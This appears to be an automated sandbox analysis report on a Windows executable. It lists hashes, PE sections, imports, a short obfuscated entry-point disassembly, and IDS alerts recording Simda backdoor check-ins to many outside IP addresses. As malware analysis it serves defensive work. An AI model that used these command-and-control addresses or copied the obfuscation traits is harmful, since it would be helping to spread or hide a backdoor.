                                                                                                                                                                                                              General

                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):7.848213512443685
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                              File name:arxtPs1STE.exe
                                                                                                                                                                                                              File size:216'576 bytes
                                                                                                                                                                                                              MD5:6154c4f64b8f9185a4644cdea5c69408
                                                                                                                                                                                                              SHA1:ce4b4763d9b269ea600e8fc594781882ca6c8486
                                                                                                                                                                                                              SHA256:a484e354b3c1d5e13033067711a085fae7e74b53c6b003c10306ed58fc9a0288
                                                                                                                                                                                                              SHA512:7bcb59b256aed8e625a86869dae4f8a828398adcd8da7ba57ee05ecdb73069d57121b476a6bfad1490fa409bf5d40852f5a2e5cdb1258160f5b8e4f8f349993e
                                                                                                                                                                                                              SSDEEP:6144:BrMoyX6dxajoPXA1nriwrw1cfCOSJcAb:ZysxVY1nZ+b
                                                                                                                                                                                                              TLSH:9D240293F38A29E7C2200D3F12F7230711B74A615375C59BE641A66D3AD65C8BCE2A37
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.8?.................,......*.................@.......................... .........Y...................................

                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                              Icon Hash:000a35b5b5b5b555

                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Entrypoint:0x401b81
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                              DLL Characteristics:
                                                                                                                                                                                                              Time Stamp:0x3F38BB49 [Tue Aug 12 10:02:49 2003 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:1c6c3b0bd56b7f130f1f283a88a358b9

                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              mov dword ptr [0042C4BBh], 00000000h
                                                                                                                                                                                                              mov eax, dword ptr [0042C4BBh]
                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              mov edx, 00000000h
                                                                                                                                                                                                              push edx
                                                                                                                                                                                                              call dword ptr [0041A0E8h]
                                                                                                                                                                                                              mov dword ptr [0042B3DBh], eax
                                                                                                                                                                                                              mov dword ptr [0042BE8Ah], 00000000h
                                                                                                                                                                                                              mov eax, dword ptr [0042BE8Ah]
                                                                                                                                                                                                              push 00000CD8h
                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                              sub dword ptr [0042B515h], ecx
                                                                                                                                                                                                              sub ecx, 00000B04h
                                                                                                                                                                                                              add ecx, 00000FC4h
                                                                                                                                                                                                              jc 00007F11E0E028E8h
                                                                                                                                                                                                              sub dword ptr [0042C68Fh], ecx
                                                                                                                                                                                                              sub dword ptr [0042BB7Fh], ecx
                                                                                                                                                                                                              shl ecx, 1
                                                                                                                                                                                                              ror ecx, 1
                                                                                                                                                                                                              inc ecx
                                                                                                                                                                                                              shr ecx, 03h
                                                                                                                                                                                                              add ecx, 0000020Ah
                                                                                                                                                                                                              jbe 00007F11E0E028E4h
                                                                                                                                                                                                              ror ecx, 1
                                                                                                                                                                                                              sub ecx, 0000063Ch
                                                                                                                                                                                                              add dword ptr [0042BBF3h], ecx
                                                                                                                                                                                                              call 00007F11E0E039A1h
                                                                                                                                                                                                              mov dword ptr [0042B16Ch], eax
                                                                                                                                                                                                              mov esi, 00000070h
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              mov ebx, 003B993Ch
                                                                                                                                                                                                              add ebx, 0004794Ch
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              push 00000001h
                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              mov ebx, 0088689Fh
                                                                                                                                                                                                              mov ecx, ebx
                                                                                                                                                                                                              sub ecx, 0046C7EFh
                                                                                                                                                                                                              call dword ptr [ecx]
                                                                                                                                                                                                              mov eax, 000B3EA0h
                                                                                                                                                                                                              mov ebp, eax
                                                                                                                                                                                                              mov ebx, 003784B2h
                                                                                                                                                                                                              add ebp, ebx
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov dword ptr [0042BD80h], 00000000h
                                                                                                                                                                                                              mov ebx, dword ptr [0042BD80h]

                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1a21c0xc8.vtzr
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x2a078.rsrc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x910000x3ac.reloc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x226400x1c.fvH
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                              Sections

                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                              .text0x10000x2b130x2c00a4d3b0ce94ad84ed9b2c4a969cc56c70False0.7213245738636364data6.3708778153510535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .D0x40000x53950x4000a4832bacfca532f98f82bc1cc110244False0.69921875data5.273643553772029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .SC0xa0000x1b670x800bb8ff8817aa8b7520a20564fd256b92fFalse0.7783203125data6.022115319944559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .Wp0xc0000x20180x2009611c8690e8bf17b251ef8b541ed1e18False0.123046875data0.6947806982136152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .aS0xf0000xa4140x400d5ffc696fc4b630af8e12dfa1574f79cFalse0.765625data6.148168693021462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .vtzr0x1a0000x77dc0x10004f89745b1d45e480b7f984a37b2ca7cbFalse0.421630859375data4.955037110529063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .fvH0x220000x812d0x800c13d406df81dfb9974deaa5e7f3abd5cFalse0.66162109375data5.533722089361082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .data0x2b0000x40e10x42001198ccdd255c02df07ec9c1fcfac9f40False0.8023200757575758data6.722929764502196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .Lx0x300000x40f80x20046a7c2a4a48f130efa5331a91bf9e031False0.8359375data6.270861660546221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .sOZF0x350000x28730x200f4b90d55380f914fc23bd3ebea3c4353False0.14453125data0.9511370466044033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .h0x380000x2dd8e0x800d7507f29fab95163821d691fdda39111False0.59033203125data4.8672358493330465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .rsrc0x660000x2a0780x2a2007ab61db470df553ddeddd538afefbc71False0.9833433790801187data7.982188426455354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .reloc0x910000x3ac0x400d66b97b3d918ce38ba35c65e93106bb1False0.8583984375data6.404465099324306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                              Resources

                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                              RT_ICON0x661780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4160412757973734
                                                                                                                                                                                                              RT_DIALOG0x672200x4cdataEnglishUnited States0.9210526315789473
                                                                                                                                                                                                              RT_RCDATA0x6726c0x28b94dataEnglishUnited States1.0003656986643006
                                                                                                                                                                                                              RT_GROUP_ICON0x8fe000x14dataEnglishUnited States1.1
                                                                                                                                                                                                              RT_VERSION0x8fe140x264dataEnglishUnited States0.5179738562091504

                                                                                                                                                                                                              Imports

                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                              KERNEL32.DLLCreateDirectoryW, GetStartupInfoW, OpenWaitableTimerW, BeginUpdateResourceA, OpenEventA, DeleteAtom, CreateMailslotW, ReplaceFileA, CompareFileTime, ReadFile, GetCalendarInfoW, SetLocaleInfoA, GetLogicalDriveStringsA, GetLastError, SetPriorityClass, GetUserDefaultLangID, SearchPathA, GetTimeFormatW, GetModuleHandleA, lstrcpy, CreateFileA, QueryPerformanceCounter, EnumDateFormatsA, ReadDirectoryChangesW, GetMailslotInfo, GetProcAddress, GlobalFindAtomW, RaiseException, EnumTimeFormatsA, GetComputerNameA, FreeLibrary, GetFullPathNameW, OpenEventW, SetComputerNameW, GetLongPathNameW, GetNamedPipeInfo, GetHandleInformation, GetExpandedNameA, SetEvent
                                                                                                                                                                                                              user32.dllGetClassInfoA, LoadMenuIndirectA, CopyIcon, WinHelpA, EnumDesktopsA, SetActiveWindow, CreateDesktopA, GetSystemMetrics, CreatePopupMenu, BringWindowToTop, PeekMessageA, ClientToScreen, SetWindowRgn, GetDlgItemTextA, GetMenuInfo, GetClassLongA, IsMenu, FrameRect, LoadIconW, InsertMenuItemA, SetWindowLongW, GetFocus, GetCaretPos, DefWindowProcA, LoadBitmapW, EnumWindows, GetMenuStringW, MessageBoxIndirectA, EmptyClipboard, GetMenuItemID, GetWindowLongW, MonitorFromPoint, DestroyWindow, SetDlgItemTextW, CreateWindowExW, CharNextA, MessageBoxIndirectW, CreateAcceleratorTableA, GetDlgItemInt, SetCursor
                                                                                                                                                                                                              GDI32.DLLCreateEnhMetaFileW, GetMetaFileBitsEx, GetMapMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CreateBitmap, GetCharacterPlacementW, FrameRgn, SetSystemPaletteUse, GetCharABCWidthsFloatW, SelectObject, CreateDCA, CreateMetaFileW, SetBkColor, CreateFontW, ExtTextOutW, GetTextExtentExPointA, CreateScalableFontResourceW, EndDoc, CreateDIBitmap, GetEnhMetaFileDescriptionW
                                                                                                                                                                                                              ADVAPI32.DLLRegOpenKeyExA, RegDeleteKeyA, RegOpenKeyExW, RegOpenKeyW, RegDeleteValueA, RegDeleteKeyW, RegQueryValueA
                                                                                                                                                                                                              shell32.dllShell_NotifyIconA, StrRChrW, StrRChrIA
                                                                                                                                                                                                              oleaut32.dllVarI2FromBool, VarR8Round, OleCreatePictureIndirect, VarUI4FromStr, SafeArrayAllocData, LHashValOfNameSys, VarDecAbs
                                                                                                                                                                                                              OPENGL32.DLLglFogiv
                                                                                                                                                                                                              setupapi.dllpSetupDoesUserHavePrivilege
                                                                                                                                                                                                              WINMM.DLLmmioClose, waveOutGetNumDevs, midiInGetDevCapsA, mciGetDeviceIDW, waveOutGetDevCapsA, mixerGetLineInfoA, auxGetDevCapsW

                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                              2024-11-11T18:33:08.071459+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.856804UDP
                                                                                                                                                                                                              2024-11-11T18:33:08.793724+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8497083.94.10.3480TCP
                                                                                                                                                                                                              2024-11-11T18:33:08.796276+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849711199.59.243.22780TCP
                                                                                                                                                                                                              2024-11-11T18:33:08.800308+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.849708TCP
                                                                                                                                                                                                              2024-11-11T18:33:08.800308+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.849708TCP
                                                                                                                                                                                                              2024-11-11T18:33:08.813310+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849710208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:33:08.863846+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849713178.162.217.10780TCP
                                                                                                                                                                                                              2024-11-11T18:33:08.912194+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707162.255.119.10280TCP
                                                                                                                                                                                                              2024-11-11T18:33:08.918825+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849710208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.078196+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971475.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.085382+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849712188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.097256+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971544.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.314628+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849716178.162.217.10780TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.403334+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971818.208.156.24880TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.412393+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.849718TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.412393+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.849718TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.609748+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84972144.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:33:09.719227+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971791.195.240.1980TCP
                                                                                                                                                                                                              2024-11-11T18:33:10.201487+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971975.2.71.199443TCP
                                                                                                                                                                                                              2024-11-11T18:33:10.653425+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709199.191.50.8380TCP
                                                                                                                                                                                                              2024-11-11T18:33:10.743945+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849720188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:10.778933+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849722154.212.231.8280TCP
                                                                                                                                                                                                              2024-11-11T18:33:11.171725+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849712188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:11.177018+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849722154.212.231.8280TCP
                                                                                                                                                                                                              2024-11-11T18:33:12.368917+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:12.903967+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84972413.248.169.4880TCP
                                                                                                                                                                                                              2024-11-11T18:33:13.177712+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8497263.94.10.3480TCP
                                                                                                                                                                                                              2024-11-11T18:33:13.302136+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84972718.208.156.24880TCP
                                                                                                                                                                                                              2024-11-11T18:33:13.584548+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849725188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:13.860185+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849728103.150.10.4880TCP
                                                                                                                                                                                                              2024-11-11T18:33:14.967974+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849728103.150.10.4880TCP
                                                                                                                                                                                                              2024-11-11T18:33:15.763972+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849729188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:16.124114+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849725188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:19.047348+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849731188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:19.622159+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973276.223.67.18980TCP
                                                                                                                                                                                                              2024-11-11T18:33:19.802617+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973364.225.91.7380TCP
                                                                                                                                                                                                              2024-11-11T18:33:20.052303+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849734103.224.182.25280TCP
                                                                                                                                                                                                              2024-11-11T18:33:20.062966+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735103.224.212.21080TCP
                                                                                                                                                                                                              2024-11-11T18:33:20.307399+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973744.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:33:20.314026+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.849737TCP
                                                                                                                                                                                                              2024-11-11T18:33:20.314026+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.849737TCP
                                                                                                                                                                                                              2024-11-11T18:33:20.393632+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849736154.85.183.5080TCP
                                                                                                                                                                                                              2024-11-11T18:33:20.680567+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849736154.85.183.5080TCP
                                                                                                                                                                                                              2024-11-11T18:33:22.587036+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84974164.225.91.7380TCP
                                                                                                                                                                                                              2024-11-11T18:33:22.840403+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849740TCP
                                                                                                                                                                                                              2024-11-11T18:33:23.106964+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86255472.52.179.17480TCP
                                                                                                                                                                                                              2024-11-11T18:33:23.804814+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86255672.52.179.17480TCP
                                                                                                                                                                                                              2024-11-11T18:33:29.068647+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85838052.34.198.22980TCP
                                                                                                                                                                                                              2024-11-11T18:33:29.077761+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.858380TCP
                                                                                                                                                                                                              2024-11-11T18:33:29.077761+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.858380TCP
                                                                                                                                                                                                              2024-11-11T18:33:32.189594+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86000344.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.095463+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849710208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.214644+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849710208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.347364+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849712188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.404903+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850108178.162.217.10780TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.421631+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850106199.59.243.22780TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.422402+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849722154.212.231.8280TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.503616+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85010975.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:33:34.542556+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850107162.255.119.10280TCP
                                                                                                                                                                                                              2024-11-11T18:33:35.316307+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850110178.162.217.10780TCP
                                                                                                                                                                                                              2024-11-11T18:33:35.687121+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85011275.2.71.199443TCP
                                                                                                                                                                                                              2024-11-11T18:33:35.785679+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849722154.212.231.8280TCP
                                                                                                                                                                                                              2024-11-11T18:33:36.066459+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85011391.195.240.1980TCP
                                                                                                                                                                                                              2024-11-11T18:33:36.398416+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850111188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:36.805439+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849712188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:38.017296+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850114188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:38.499010+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849728103.150.10.4880TCP
                                                                                                                                                                                                              2024-11-11T18:33:38.526649+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849725188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:39.383050+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849728103.150.10.4880TCP
                                                                                                                                                                                                              2024-11-11T18:33:40.905596+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850115188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:41.269729+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849725188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:43.234703+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850116188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:44.359831+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850117103.224.212.21080TCP
                                                                                                                                                                                                              2024-11-11T18:33:44.512999+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849736154.85.183.5080TCP
                                                                                                                                                                                                              2024-11-11T18:33:44.760611+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850118103.224.182.25280TCP
                                                                                                                                                                                                              2024-11-11T18:33:47.260110+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849736154.85.183.5080TCP
                                                                                                                                                                                                              2024-11-11T18:33:51.115283+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86066972.52.179.17480TCP
                                                                                                                                                                                                              2024-11-11T18:33:52.527855+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86067372.52.179.17480TCP
                                                                                                                                                                                                              2024-11-11T18:33:57.677062+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.855157UDP
                                                                                                                                                                                                              2024-11-11T18:34:03.909558+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860687188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:34:03.910005+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86069075.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.004679+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860696188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.020892+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860700208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021032+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86070244.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021086+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860698188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021151+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86069544.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021169+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86070123.253.46.6480TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021867+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86069475.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:34:05.064133+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.860697TCP
                                                                                                                                                                                                              2024-11-11T18:34:05.780817+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8607103.94.10.3480TCP
                                                                                                                                                                                                              2024-11-11T18:34:05.780873+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860709199.191.50.8380TCP
                                                                                                                                                                                                              2024-11-11T18:35:02.384951+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.858292UDP
